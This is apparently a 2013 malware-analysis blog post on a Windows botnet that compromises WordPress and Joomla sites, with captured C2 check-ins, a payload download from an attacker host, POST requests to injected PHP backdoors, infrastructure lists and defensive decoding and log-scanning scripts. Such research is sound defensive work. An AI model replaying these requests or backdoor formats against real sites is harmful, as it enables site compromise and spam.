Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are performed by automated scanners and tools. However, we believe there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy, Win32; MD5 20a6ebf61243b760dd65f897236b6ad3, VirusTotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32), MD5 7958f73daf4b84e3b00e008258ea2e7a (VirusTotal)
2) SDbot (Win32), MD5 aaee52bfb589f6534c4b51e3b144dc08 (VirusTotal)
3) PHP scripts for injection into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners are often alerted to copious amounts of pharmacy and porn spam emanating from their sites). This is also the source of the rotating spam links: thousands of different URLs that all redirect to the same few destination sites (e.g. weight-loss products, work-at-home scams, or porn sites).

The "hackers" attacking the Wordpress servers are armies of compromised Windows desktops that continuously check the C&C servers for new targets. This is why sites that are cleaned but not fully patched and secured get compromised over and over. It is trivial for a site owner to discover the malicious PHP script on their server; it is much harder to discover how the server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed RAM to be captured easily and then analyzed with Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active. Both names belong to legitimate Windows binaries (the console host and the MSMQ triggers service), so the process name alone is not a useful indicator here; the parent/child relationship and the outbound connections are.


By examining the pcap, we learn that mqtgsvc.exe checks in with the domain www.wholists.org.

The unpacked version of conhost.exe (MD5 7958F73DAF4B84E3B00E008258EA2E7A) contains a Base94 alphabet, which is used for encoding strings and communication requests in addition to the common Base64:

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

1. Initial callback. The pcap shows the initial communication with 'www.wholists.org' on 95.163.104.69:

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org', where it requests 'conh11.jpg' for download. Despite the extension, the file is a Win32 executable rather than a JPG (note that the server itself serves it as application/octet-stream). Its MD5 is 7958f73daf4b84e3b00e008258ea2e7a, the same hash listed for the Symmi injector above, and it is well detected on VirusTotal.

GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3. Next, our bot sends a GET request for "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET for ae1.php from bt.ads-runner.org on 208.115.109.53:

GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes

PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

Several PHP scripts were observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected into a vulnerable server. We link here to the PHP scripts we saw in use by this malware. The presence of any of these scripts on a CMS webserver is a good indication of compromise.
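The body returned by ae1.php is not plain Base64. Base64-decoding the captured blob above and then XORing every byte with 0x02 yields a spam message template with <USER>, <NAME>, <SUBJ> and <SBODY> fields (the leading bytes "PldRR1A8" are exactly "<USER>" under that transform), which fits the PHP spambot described at the start of this post. The fourth form parameter of the POST requests shown in step 4 below begins with the same "PldRR1A8" bytes and decodes the same way. The decoder below is an added example written for this page, not code from the malware or from DeepEnd Research. The template it encodes and decodes is a constructed placeholder with the same layout as the captured one (persona, subject and link are invented), and the whitespace stripping exists because the captured values are wrapped into 76-column lines.

```python
import base64
import re
from urllib.parse import unquote

# Single-byte XOR key. Recovered from the captured response: the leading
# base64 "PldRR1A8" decodes to the bytes ">WQGP<", which XOR 0x02 gives "<USER>".
XOR_KEY = 0x02

# Constructed sample in the same layout as the captured ae1.php template.
# The persona, subject and link are placeholders, not data from the capture.
SAMPLE_TEMPLATE = (
    "<USER>spam_persona</USER>\n"
    '<NAME>"Spam Persona"</NAME>\n'
    "<SUBJ>constructed subject line</SUBJ>\n"
    "<SBODY>\n"
    '<div><a href="http://example.invalid/components/com_poll/x.html">'
    "constructed link text</a></div>\n"
    "</SBODY>\n"
)


def obfuscate(text: str, key: int = XOR_KEY, wrap: int = 76) -> str:
    """Encode as the C2 does: XOR every byte with the key, base64, wrap at 76 columns."""
    raw = bytes(b ^ key for b in text.encode("latin-1"))
    b64 = base64.b64encode(raw).decode("ascii")
    return "\n".join(b64[i:i + wrap] for i in range(0, len(b64), wrap))


def deobfuscate(blob: str, key: int = XOR_KEY) -> str:
    """Reverse it. Accepts a raw response body or a URL-encoded POST parameter
    value (%2B, %2F, %3D) and tolerates the line wrapping seen in the capture."""
    compact = re.sub(r"\s+", "", unquote(blob))
    raw = base64.b64decode(compact)
    return bytes(b ^ key for b in raw).decode("latin-1")


TAG_RE = re.compile(r"<(USER|NAME|SUBJ|SBODY)>(.*?)</\1>", re.S)


def parse_template(text: str) -> dict:
    """Split the decoded template into its fields; SBODY is the raw HTML snippet."""
    return {tag: body.strip() for tag, body in TAG_RE.findall(text)}


def decode_template(blob: str) -> dict:
    return parse_template(deobfuscate(blob))


def looks_like_template(value: str) -> bool:
    """Triage check for pcaps and POST bodies: a template that begins with
    '<USER>' always encodes to a value starting with 'PldRR1A8'."""
    return re.sub(r"\s+", "", unquote(value)).startswith("PldRR1A8")


if __name__ == "__main__":
    blob = obfuscate(SAMPLE_TEMPLATE)
    print(blob)
    for tag, value in decode_template(blob).items():
        print(f"{tag}: {value}")
```

Feeding the captured body (or the url-decoded fourth POST parameter) to decode_template gives the sender persona, the subject line and the HTML body that the injected spambot is told to send; grepping a pcap for the "PldRR1A8" prefix is a cheap way to pick out every such message.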

4. The next conversation our bot initiated was of particular interest. Here the bot sent repeated requests for "ggu.php" to 'fw.point-up.org' on 85.143.166.221. Each response contained a single URL pointing at a Wordpress or Joomla site:

GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on fw.point-up.org, the bot attempts exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- "OK" followed by the MD5 hash of the string 1234567890, then "+0"
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. 406 Not Acceptable -- the target's mod_security blocked the request, so the bot gets no "OK" back (this says nothing about whether the script on that host is otherwise reachable)
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].org
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

3. 200 OK with a text/html body (the 354-byte body is not reproduced here)
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
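
On the site owner's side, the requests above leave a recognisable trace in the web server's access log even though the POST bodies are not logged: a POST to a .php file sitting under a directory that should only hold static content (a cache, img or assets directory, as in the injected-script paths above), sent with the bare User-Agent "Mozilla/5.0" and answered with a 200. The scanner below is an added example, not a tool from the post; the directory list and the exact-UA match are assumptions tuned to this capture and should be extended for a given site layout, and the log lines are constructed (the paths are taken from the requests above, the addresses, sizes and timestamps are invented).

```python
import re
from typing import NamedTuple, Optional

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumption: directory names a CMS uses for static content, where a PHP file
# should never execute. Chosen from the injected-script paths in this capture
# (.../cache/diggCache/.../page.php, .../assets/javascript.php,
# .../advcode/img/test.php); extend for your own site layout.
STATIC_DIRS = {"cache", "img", "images", "assets", "uploads", "tmp"}

# The bot sends the bare string "Mozilla/5.0" as its User-Agent; real browsers
# send a much longer one, so an exact match is a cheap fingerprint.
BOT_UA = "Mozilla/5.0"


class Hit(NamedTuple):
    ip: str
    path: str
    status: str
    reasons: tuple


def classify(line: str) -> Optional[Hit]:
    """Return a Hit listing the matching reasons, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0]
    dirs = set(path.lower().split("/")[:-1])
    reasons = []
    if path.lower().endswith(".php") and dirs & STATIC_DIRS:
        reasons.append("php-under-static-dir")
    if m["method"] == "POST" and m["ua"] == BOT_UA:
        reasons.append("bare-ua-post")
    if not reasons:
        return None
    return Hit(m["ip"], path, m["status"], tuple(reasons))


def scan(lines) -> list:
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (RFC 5737 test addresses). The paths are the
# ones seen in the capture above; the surrounding browsing traffic is invented.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /administrator/components/com_akeeba/assets/javascript.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2013:03:27:22 +0000] "POST /English/data/cache/diggCache/f7/19/18/page.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/May/2013:03:28:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
    '203.0.113.9 - - [27/May/2013:03:28:01 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "http://www.example.com/" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
    '198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1" 406 226 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit.ip, hit.status, hit.path, ",".join(hit.reasons))
```

The mod_security-blocked request (status 406) is still flagged on the User-Agent alone, which is the point of combining the two rules: a 200 under a static directory means the injected script answered, while a burst of bare-UA POSTs from one address is worth a look regardless of status.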



Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure:

Domain                   IP Address       ASN       Network Name
wholists.org             95.163.104.69    AS12695   Digital Networks CJSC
gettrial.store-apps.org  95.163.104.94    AS12695   Digital Networks CJSC
t22.run-stat.org         95.163.104.69    AS12695   Digital Networks CJSC
seek4.run-stat.org       46.165.230.185   AS16265   Leaseweb
bt.ads-runner.org        208.115.109.53   AS23033   Wowrack
fw.point-up.org          85.143.166.221   AS56534   PIRIX-CORPNET-2


Passive DNS

Hostnames observed resolving to each of the IP addresses above (one column per IP):

95.163.104.69      95.163.104.94           46.165.230.185      208.115.109.53       85.143.166.221
www.wholists.org   ns1.wholists.org        ns1.upsave.info     ntp.run-stat.org     fw.point-up.org
bns.wholists.org   ns1.store-apps.org      fw.stat-run.info    bt.ads-runner.org    ns2.memrem.ru
gjd.wholists.org   ns1.games-olympic.org   fw.run-stat.org     sk4.ads-runner.org   ns2.nalkanet.ru
lbh.wholists.org   ns1.googleminiapi.com   mail.stat-run.info  ntp.stat-run.info    ns2.nallanite.ru
qdp.wholists.org   peace.vijproject.com    bt2.run-stat.org
vm.clodoserver.ru  (column not recoverable from the flattened table)
www.techsign.org   sogood.vitaminavip.com  jc.upsave.info
ml.inviteyou.info  img.stat-run.info       ju.upsave.info

Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 & 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013

In January, we see that for the prefix 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack

Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013

For the prefix 208.115.109.0/24, Wowrack's primary upstream is AS11404 (AS-VOBIZ, vanoppen.biz LLC).
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2

Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013

In January, for the prefix 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534